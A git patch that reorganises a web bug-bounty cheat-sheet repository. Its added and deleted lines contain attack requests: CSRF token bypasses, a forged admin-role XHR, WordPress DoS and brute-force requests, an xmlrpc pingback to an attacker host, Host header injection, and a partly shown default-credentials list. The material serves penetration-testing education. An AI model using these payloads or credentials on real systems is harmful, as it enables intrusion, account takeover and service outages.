From a2c07348e358f418ee2b88f7b39b5a653101c0be Mon Sep 17 00:00:00 2001 From: daffainfo Date: Wed, 15 Jun 2022 17:38:42 +0700 Subject: [PATCH] Update structure each readme --- ...File Upload.md => Arbitrary File Upload.md | 0 Business Logic Errors.md | 8 +- Bypass/Bypass 2FA.md | 6 +- Bypass/Bypass 304.md | 5 +- Bypass/Bypass 403.md | 13 +- Bypass/Bypass 429.md | 7 +- Bypass/Bypass CSRF.md | 120 + Bypass/Bypass Captcha.md | 1 + CMS/WordPress.md | 69 - Cross Site Request Forgery.md | 126 +- Cross Site Scripting.md | 9 +- Denial Of Service.md | 25 +- Exposed Source Code.md | 24 +- Framework/Zend.MD | 3 - Host Header Injection.md | 10 +- Insecure Direct Object References.md | 8 +- Misc/Account Takeover.md | 4 +- Misc/Broken Link Hijacking.md | 14 +- Misc/Default Credentials.csv | 2561 ----------------- Misc/Email Spoofing.md | 3 +- Misc/Exposed API keys.md | 17 +- Misc/JWT Vulnerabilities.md | 8 +- Misc/Mass Assignment.md | 8 +- Misc/Password Reset Flaws.md | 11 +- Misc/Tabnabbing.md | 8 +- NoSQL Injection.md | 12 +- OAuth Misconfiguration.md | 22 +- Open Redirect.md | 10 +- README.md | 13 +- Recon/Scope.md | 2 + Recon/Shodan Dorks.md | 2 +- .../laravel.md => Technologies/Laravel.md | 0 Technologies/Moodle.md | 4 +- Technologies/WordPress.md | 101 + Technologies/Zend.md | 13 + Web Cache Poisoning.md | 20 +- 36 files changed, 405 insertions(+), 2862 deletions(-) rename Bypass/Bypass File Upload.md => Arbitrary File Upload.md (100%) create mode 100644 Bypass/Bypass CSRF.md delete mode 100644 CMS/WordPress.md delete mode 100644 Framework/Zend.MD delete mode 100644 Misc/Default Credentials.csv rename Framework/laravel.md => Technologies/Laravel.md (100%) create mode 100644 Technologies/WordPress.md create mode 100644 Technologies/Zend.md diff --git a/Bypass/Bypass File Upload.md b/Arbitrary File Upload.md similarity index 100% rename from Bypass/Bypass File Upload.md rename to Arbitrary File Upload.md diff --git a/Business Logic Errors.md b/Business Logic Errors.md index e7e005f..9249590 100644 --- a/Business Logic Errors.md +++ b/Business Logic Errors.md @@ -1,9 +1,9 @@ # Business Logic Errors -## **Introduction** +## Introduction Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization. -## **How to Find** +## How to find 1. Review Functionality - Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product. - Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve. @@ -54,5 +54,5 @@ Business Logic Errors are ways of using the legitimate processing flow of an app - Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment - Response Manipulation to bypass certain restrictions such as 2FA Bypass -Reference: -- [@harshbothra_](https://twitter.com/harshbothra_) \ No newline at end of file +## References +* [@harshbothra_](https://twitter.com/harshbothra_) \ No newline at end of file diff --git a/Bypass/Bypass 2FA.md b/Bypass/Bypass 2FA.md index f988b94..a274066 100644 --- a/Bypass/Bypass 2FA.md +++ b/Bypass/Bypass 2FA.md @@ -1,4 +1,4 @@ -# 2FA Bypass +# Bypass Two-Factor Authentication 1. Response manipulation @@ -90,4 +90,6 @@ Host: vuln.com code=null ``` -Source: [Harsh Bothra](https://twitter.com/harshbothra_) and other writeup \ No newline at end of file +## References +* [Harsh Bothra](https://twitter.com/harshbothra_) +* Other writeup \ No newline at end of file diff --git a/Bypass/Bypass 304.md b/Bypass/Bypass 304.md index c28ef0b..21b62cc 100644 --- a/Bypass/Bypass 304.md +++ b/Bypass/Bypass 304.md @@ -1,4 +1,4 @@ -# 304 Not Modified Bypass +# Bypass 304 (Not Modified) 1. Delete "If-None-Match" header ``` @@ -26,4 +26,5 @@ Host: target.com If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b ``` -Source: [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521) +## References +* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521) diff --git a/Bypass/Bypass 403.md b/Bypass/Bypass 403.md index ba5efef..52e316e 100644 --- a/Bypass/Bypass 403.md +++ b/Bypass/Bypass 403.md @@ -1,11 +1,5 @@ -# 403 Forbidden Bypass +# Bypass 403 (Forbidden) -## Tools - -* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403) - - -## Exploit 1. Using "X-Original-URL" header ``` GET /admin HTTP/1.1 @@ -67,6 +61,9 @@ Host: victim.com X­-Original-­URL: /admin ``` -Source: +## Tools +* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403) + +## References - [@iam_j0ker](https://twitter.com/iam_j0ker) - [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web) diff --git a/Bypass/Bypass 429.md b/Bypass/Bypass 429.md index be6f9f6..3444abc 100644 --- a/Bypass/Bypass 429.md +++ b/Bypass/Bypass 429.md @@ -1,4 +1,5 @@ -# 429 Rate limit Bypass +# Bypass 429 (Too Many Requests) + 1. Try add some custom header ``` X-Forwarded-For : 127.0.0.1 @@ -79,3 +80,7 @@ Host: target.com {"email":"victim@gmail.com "} ``` + +## References +* [Huzaifa Tahir](https://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd) +* [Gupta Bless](https://gupta-bless.medium.com/rate-limiting-and-its-bypassing-5146743b16be) \ No newline at end of file diff --git a/Bypass/Bypass CSRF.md b/Bypass/Bypass CSRF.md new file mode 100644 index 0000000..2cc165f --- /dev/null +++ b/Bypass/Bypass CSRF.md @@ -0,0 +1,120 @@ +# Bypass CSRF + +1. Change single character +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab +``` + +2. Sending empty value of token +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token= +``` + +3. Replace the token with same length +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaabaa +``` +4. Changing POST / GET method +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 +Host: target.com +[...] +``` + +5. Remove the token from request +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456 +``` + +6. Use another user's valid token +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=ANOTHER_VALID_TOKEN +``` + +7. Try to decrypt hash +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=MTIzNDU2 +``` +MTIzNDU2 => 123456 with base64 + +8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=vi802jg9f8akd9j123 +``` +When we register again, the request like this +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=vi802jg9f8akd9j124 +``` +If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part diff --git a/Bypass/Bypass Captcha.md b/Bypass/Bypass Captcha.md index 0c9d91b..29ed221 100644 --- a/Bypass/Bypass Captcha.md +++ b/Bypass/Bypass Captcha.md @@ -1,4 +1,5 @@ # Bypass Captcha + 1. Try changing the request method, for example POST to GET ``` POST / HTTP 1.1 diff --git a/CMS/WordPress.md b/CMS/WordPress.md deleted file mode 100644 index d5f9d74..0000000 --- a/CMS/WordPress.md +++ /dev/null @@ -1,69 +0,0 @@ -# WordPress Common Bugs - -1. Denial of Service via load-scripts.php -``` -http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter -``` - -2. Denial of Service via load-styles.php -``` -http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic -``` - -3. Log files exposed -``` -http://target.com/wp-content/debug.log -``` - -4. Backup file wp-config exposed -``` -.wp-config.php.swp -wp-config.inc -wp-config.old -wp-config.txt -wp-config.html -wp-config.php.bak -wp-config.php.dist -wp-config.php.inc -wp-config.php.old -wp-config.php.save -wp-config.php.swp -wp-config.php.txt -wp-config.php.zip -wp-config.php.html -wp-config.php~ -``` - -5. Information disclosure wordpress username -``` -http://target.com/?author=1 -``` -``` -http://target.com/wp-json/wp/v2/users -http://target.com/?rest_route=/wp/v2/users -``` - -6. Bruteforce in wp-login.php -``` -POST /wp-login.php HTTP/1.1 -Host: target.com - -log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1 -``` - -7. XSPA in wordpress -``` -POST /xmlrpc.php HTTP/1.1 -Host: target.com - - -pingback.ping - -http://yourip:port - - -https://target.com> - - - -``` diff --git a/Cross Site Request Forgery.md b/Cross Site Request Forgery.md index c685c34..5726e5e 100644 --- a/Cross Site Request Forgery.md +++ b/Cross Site Request Forgery.md @@ -1,9 +1,9 @@ # Cross Site Request Forgery (CSRF) + ## Introduction Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated -## How to Find - +## How to exploit 1. HTML GET Method ```html @@ -37,124 +37,4 @@ xhr.withCredentials = true; xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xhr.send('{"role":admin}'); -``` - -## Bypass CSRF Token -1. Change single character -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab -``` - -2. Sending empty value of token -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token= -``` - -3. Replace the token with same length -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaabaa -``` -4. Changing POST / GET method -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 -Host: target.com -[...] -``` - -5. Remove the token from request -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456 -``` - -6. Use another user's valid token -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=ANOTHER_VALID_TOKEN -``` - -7. Try to decrypt hash -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=MTIzNDU2 -``` -MTIzNDU2 => 123456 with base64 - -8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=vi802jg9f8akd9j123 -``` -When we register again, the request like this -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=vi802jg9f8akd9j124 -``` -If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part +``` \ No newline at end of file diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md index 1d29e70..8005eb4 100644 --- a/Cross Site Scripting.md +++ b/Cross Site Scripting.md @@ -1,6 +1,6 @@ # XSS Cheat Sheet (Basic) -## **Introduction** +## Introduction Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There is 3 types of XSS Attack: - Reflected XSS @@ -12,7 +12,7 @@ Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious s A type of XSS that has payloads found in the DOM rather than within the HTML code. -## **Payloads** +## **How to exploit** 1. Basic payload ```html @@ -381,5 +381,6 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")(); ``` -Reference: -- [Brute Logic](https://brutelogic.com.br/) \ No newline at end of file +## References +- [Brute Logic](https://brutelogic.com.br/) +- Some random twitter posts \ No newline at end of file diff --git a/Denial Of Service.md b/Denial Of Service.md index 0fcdafd..c75adda 100644 --- a/Denial Of Service.md +++ b/Denial Of Service.md @@ -1,27 +1,28 @@ # Denial of Service -## **Introduction** +## Introduction Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it -## **How to Find** +## How to FInd 1. Cookie bomb - ``` - https://target.com/index.php?param1=xxxxxxxxxxxxxx - ``` +``` +https://target.com/index.php?param1=xxxxxxxxxxxxxx +``` After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable 2. Try input a very long payload to form. For example using very long password or using very long email - ``` - POST /Register - [...] +``` +POST /Register HTTP/1.1 +Host: target.com +[...] - username=victim&password=aaaaaaaaaaaaaaa - ``` +username=victim&password=aaaaaaaaaaaaaaa +``` 3. Pixel flood, using image with a huge pixels -Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/128/5f5a974e5f67ab7a11d2d92bd40f8997969f2f17/lottapixel.jpg?response-content-disposition=attachment%3B%20filename%3D%22lottapixel.jpg%22%3B%20filename%2A%3DUTF-8%27%27lottapixel.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYFO7EZHL%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110133Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFIaCXVzLXdlc3QtMiJGMEQCIGgY3dUtffr4V%2BoxTJaFxc%2F7qjRodT3XLyN1ZLEF8%2FhfAiAXklx1Zvy3iKIGm1bocpDUP1cTx46eTbsDOKqRC93fgyq0AwhbEAEaDDAxMzYxOTI3NDg0OSIMH9s8JiCh%2B%2FNADeibKpEDocuqfbmxkM5H5iKsA3K4RuwcxVT9ORLJrjJO%2FILAm%2BcNsQXTgId%2Bpw1KOLkbFKrq0BQIC6459JtfWqHPXvDC7ZJGboQ%2FXE0F%2BAZQa6jaEyldrkKuDewNy5jy3VX1gquS%2BWrGl%2BGhwmXB4cg1jgOugGUsC%2FxD%2BcragIJAtGA7lp3YdcL%2FiQbnvuzmLP8w%2FyCHPUrpOw94bPOk8fpetOJoLmDfXZdL3hLGBEUGS7dSOoyebLSXGZDctkSpnXCq383lWYWYn0LSv1ooVvuCVzgxE%2BZi4b4QvLjjMG3FJdEX%2BDYmnDvnSrRoDtyj8bD3cP3xbZ3jaNYRbIlQTm2zR1DgoaDGE74FmpZWHcyC8zK0V6AKG6OzkcIaGRnGdDNSpZkN0DrWE7uY6BLiIGY16rflYOaElnbxijoMNDsU3MZH8gGk7crYJ%2FCeHeayInPBDgiREBgn7orAIjOY3xg8vzwKO96a90LmkK7wk977TbKfLIng1iNP9EMKYDjGePdBYDML9zBeqhO5LrVH%2BfbwzG5GXi0w5fnn%2BgU67AFRBwMChVRr%2FLW4j0PqpXUeN5ysVIuagoqSwqOhfwI9rtk56zTuGhO3du4raY5SOQ9vSkRdYHhga%2BW7oQTByD1ISiSaOjHs1s%2FrNfvIfMA8r0drPSykOdCuV2A5NhBpEPpT%2BuOosogdPihcORhO3hbcQJ9y4uxBsaBSJr%2F8S2CGjwZw7SOGmNaNFsPu%2BMRbYDA%2FH2eUMBl96w6KpUuNAXEPUcfq3weRMP1vXW62S4OyniYJ6DEVRkkE4eFZMUqy4c94uwSAegK54Po0V0sPM%2FncTESCgBf7Qe2zZlPhdRGZR%2F25cF6JTH0t2VIRQw%3D%3D&X-Amz-Signature=a837cb6b26bf437fa5008695310a21788918081c36e745d286c5cba9fd4a78e0) +Download the payload: [Here](https://daffa.tech/lottapixel3.jpg) 4. Frame flood, using GIF with a huge frame @@ -112,7 +113,7 @@ Accept-Encoding: gzip, gzip, deflate, br, br ![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png) -References: +## References - [Hackerone #840598](https://hackerone.com/reports/840598) - [Hackerone #105363](https://hackerone.com/reports/105363) - [Hackerone #390](https://hackerone.com/reports/390) diff --git a/Exposed Source Code.md b/Exposed Source Code.md index 7748340..2360b4c 100644 --- a/Exposed Source Code.md +++ b/Exposed Source Code.md @@ -1,42 +1,58 @@ # Exposed Source Code -## **Introduction** +## Introduction Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application. -## **How to Find** +## How to FInd 1. Exposed Git folder ``` https://site.com/.git ``` ![GIT folder](https://1.bp.blogspot.com/-wTZOuULaqNw/XliI9jS0w3I/AAAAAAAAATA/VZxs7VL5PCY8FdnoKaEjS6AWpcjoJz4MgCLcBGAsYHQ/s1600/1.png) +Tools to dump .git +* https://github.com/arthaud/git-dumper + 2. Exposed Subversion folder ``` https://site.com/.svn ``` ![SVN folder](https://1.bp.blogspot.com/-5bC_EhFShgk/XliJqiw8pJI/AAAAAAAAATI/2HhrX0Ea3MwQ60Ax2tzNprNvulggPrZAACLcBGAsYHQ/s1600/1.png) +Tools to dump .svn +* https://github.com/anantshri/svn-extractor + 3. Exposed Mercurial folder ``` https://site.com/.hg ``` ![HG folder](https://1.bp.blogspot.com/-4FaqUeTlv4k/XliKHBOpgmI/AAAAAAAAATQ/sLdwhvSF-Jgn0WF5P-PouLp6uTeHUAOWACLcBGAsYHQ/s1600/1.png) +Tools to dump .hg +* https://github.com/arthaud/hg-dumper + 4. Exposed Bazaar folder ``` http://target.com/.bzr ``` ![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png) +Tools to dump .bzr +* https://github.com/shpik-kr/bzr_dumper + 5. Exposed Darcs folder ``` http://target.com/_darcs ``` +Tools to dump _darcs (Not found) + 6. Exposed Bitkeeper folder ``` http://target.com/Bitkeeper ``` -Reference: -- [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html) +Tools to dump BitKeeper (Not found) + +## Reference +* [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html) diff --git a/Framework/Zend.MD b/Framework/Zend.MD deleted file mode 100644 index 0f9f732..0000000 --- a/Framework/Zend.MD +++ /dev/null @@ -1,3 +0,0 @@ -# Common bug in Zend framework -1. Exposed config files -* Full Path Exploit : http://target.com//application/configs/application.ini diff --git a/Host Header Injection.md b/Host Header Injection.md index 1516af5..d224674 100644 --- a/Host Header Injection.md +++ b/Host Header Injection.md @@ -1,10 +1,9 @@ # Host Header Injection -## **Introduction** +## Introduction HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks. -## **How to Find** - +## How to exploit 1. Change the host header ``` GET /index.php HTTP/1.1 @@ -47,5 +46,6 @@ GET https://vulnerable-website.com/ HTTP/1.1 Host: evil-website.com ... ``` -Reference: -- [PortSwigger](https://portswigger.net/web-security/host-header/exploiting) + +## References +* [PortSwigger](https://portswigger.net/web-security/host-header/exploiting) diff --git a/Insecure Direct Object References.md b/Insecure Direct Object References.md index b956c1c..8e4b3ca 100644 --- a/Insecure Direct Object References.md +++ b/Insecure Direct Object References.md @@ -1,9 +1,9 @@ # Insecure Direct Object Reference (IDOR) -## **Introduction** +## Introduction IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system. -## **How to Find** +## How to FInd 1. Add parameters onto the endpoints for example, if there was ``` GET /api/v1/getuser @@ -152,5 +152,5 @@ GET /api/users/* 16. Try google dorking to find new endpoint -Reference: -- [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup +## References +* [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup diff --git a/Misc/Account Takeover.md b/Misc/Account Takeover.md index e5fa507..38977b1 100644 --- a/Misc/Account Takeover.md +++ b/Misc/Account Takeover.md @@ -1,9 +1,9 @@ # Account Takeover -## **Introduction** +## Introduction Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else. -## **How to Find** +## How to exploit 1. Using OAuth Misconfiguration - Victim has a account in evil.com - Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email diff --git a/Misc/Broken Link Hijacking.md b/Misc/Broken Link Hijacking.md index 3dcedca..901d986 100644 --- a/Misc/Broken Link Hijacking.md +++ b/Misc/Broken Link Hijacking.md @@ -1,16 +1,16 @@ # Broken Link Hijacking -## Tools -- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) - -## Definition +## Introduction Broken Link Hijacking exists whenever a target links to an expired domain or page ## How to find 1. Manually find external links on the target site (For example, check some links to social media accounts) 2. Try using tools to find broken link, for example using tools that listed in this readme -References: -- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/) +## Tools +- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) -- [How I was able to takeover the company’s LinkedIn Page](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d) \ No newline at end of file +## References +- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/) +- [How I was able to takeover the company’s LinkedIn Page](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d) +- [Hackerone #1466889](https://hackerone.com/reports/1466889) \ No newline at end of file diff --git a/Misc/Default Credentials.csv b/Misc/Default Credentials.csv deleted file mode 100644 index afb456f..0000000 --- a/Misc/Default Credentials.csv +++ /dev/null @@ -1,2561 +0,0 @@ -Vendor,Model/Software name,Version,Access Type,Username,Password,Privileges,Notes -155,CoreBuilder,2500,Telnet,,admin,, -155,CoreBuilder,2500,Telnet,debug,synnet,, -155,CoreBuilder,2500,Telnet,tech,tech,, -2Wire Inc.,Wireless Routers,,,http,,Administrator, -2Wire,WiFi routers,,HTTP,,Wireless,Admin,Almost all 2wire routers -360 Systems,Image Server 2000,,,factory,factory,, -3COM,,,Telnet,adm,,, -3COM,,,Telnet,admin,synnet,, -3COM,,,Telnet,manager,manager,, -3COM,,,Telnet,monitor,monitor,, -3COM,,,Telnet,read,synnet,, -3COM,,,Telnet,security,security,, -3COM,,,Telnet,write,synnet,, -3COM,,1.25,,root,letmein,, -3COM,11g Cable/DSL Gateway,,,,,, -3COM,3C16405,,Multi,admin,,Admin, -3COM,3C16406,,Multi,admin,,Admin, -3COM,3C16450,,Multi,admin,,Admin, -3COM,3CRADSL72,1.2,Multi,,1234admin,Admin, -3COM,3CRWE52196,,,,admin,Administrator, -3COM,3Com SuperStack 3 Switch 3300XM,,,security,security,Admin, -3COM,3Com SuperStack 3,,,security,security,Admin, -3COM,3c16405,,Console,Administrator,,Admin, -3COM,AccessBuilder,7000 BRI,SNMP,SNMPWrite,private,Admin, -3COM,AirConnect AP,,SNMP,,comcomcom,, -3COM,AirConnect Access,01.50-01,Multi,,,Admin, -3COM,CB9000/4007,3,Console,FORCE,,Admin, -3COM,CellPlex,,HTTP,admin,synnet,Admin, -3COM,CellPlex,7000,Telnet,,,Admin, -3COM,CellPlex,7000,Telnet,admin,,Admin, -3COM,CellPlex,7000,Telnet,admin,admin,Admin, -3COM,CellPlex,7000,Telnet,root,,Admin, -3COM,CellPlex,7000,Telnet,tech,,Admin, -3COM,CellPlex,7000,Telnet,tech,tech,User, -3COM,CoreBuilder,7000,Telnet,operator,admin,Admin, -3COM,CoreBuilder,7000/6000/3500/2500,SNMP,SNMPWrite,private,Admin, -3COM,CoreBuilder,7000/6000/3500/2500,Telnet,,,Admin, -3COM,CoreBuilder,7000/6000/3500/2500,Telnet,,admin,Admin, -3COM,CoreBuilder,7000/6000/3500/2500,Telnet,debug,synnet,, -3COM,CoreBuilder,7000/6000/3500/2500,Telnet,tech,tech,, -3COM,HiPerACT,v4.1.x,Telnet,admin,,Admin, -3COM,HiPerARC,v4.1.x,Telnet,adm,,, -3COM,HiPerARC,v4.1.x,Telnet,adm,,Admin, -3COM,Internet Firewall,3C16770,HTTP,admin,password,Admin, -3COM,LANplex,2500,Telnet,debug,synnet,, -3COM,LANplex,2500,Telnet,tech,,Admin, -3COM,LANplex,2500,Telnet,tech,tech,, -3COM,LinkBuilder,,Telnet,tech,tech,Admin, -3COM,LinkSwitch,2000/2700,Telnet,tech,tech,, -3COM,NetBuilder,,,,admin,User,SNMP_READ -3COM,NetBuilder,,Multi,admin,,Admin, -3COM,NetBuilder,,SNMP,,ANYCOM,,SNMP disabled by default -3COM,NetBuilder,,SNMP,,ANYCOM,snmp-read,SNMP disabled by default -3COM,NetBuilder,,SNMP,,ILMI,snmp-read, -3COM,NetBuilder,,SNMP,,ILMI,snmp-read,SNMP disabled by default -3COM,Netbuilder,,HTTP,Root,,Admin,http://10.1.0.1 -3COM,Netbuilder,,Multi,admin,,Admin, -3COM,OCR-812,,,root,!root,, -3COM,OfficeConnect 812 ADSL,,Multi,Administrator,admin,Admin, -3COM,OfficeConnect 812 ADSL,,Multi,adminttd,adminttd,Admin, -3COM,OfficeConnect 812 